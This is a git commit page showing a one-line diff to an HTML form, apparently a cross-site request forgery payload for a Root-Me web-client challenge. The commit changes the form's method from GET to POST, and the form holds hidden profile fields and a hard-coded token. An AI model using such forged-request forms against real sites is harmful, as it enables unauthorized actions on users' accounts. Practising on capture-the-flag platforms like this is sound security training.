change get to post
continuous-integration/drone/push Build is passing

This commit is contained in:
2024-09-14 12:37:15 +02:00
parent 0a57de3b21
commit 846a8d4224
+1 -1
View File
@@ -1,4 +1,4 @@
<form id="pl" method="GET" action="http://challenge01.root-me.org/web-client/ch23/?action=profile"> <form id="pl" method="POST" action="http://challenge01.root-me.org/web-client/ch23/?action=profile">
<input type="text" name="username" value="a"> <input type="text" name="username" value="a">
<input type="checkbox" name="status" checked> <input type="checkbox" name="status" checked>
<input type="text" name="token" value="769c1cabcf028393e63536a45f96c19e"> <input type="text" name="token" value="769c1cabcf028393e63536a45f96c19e">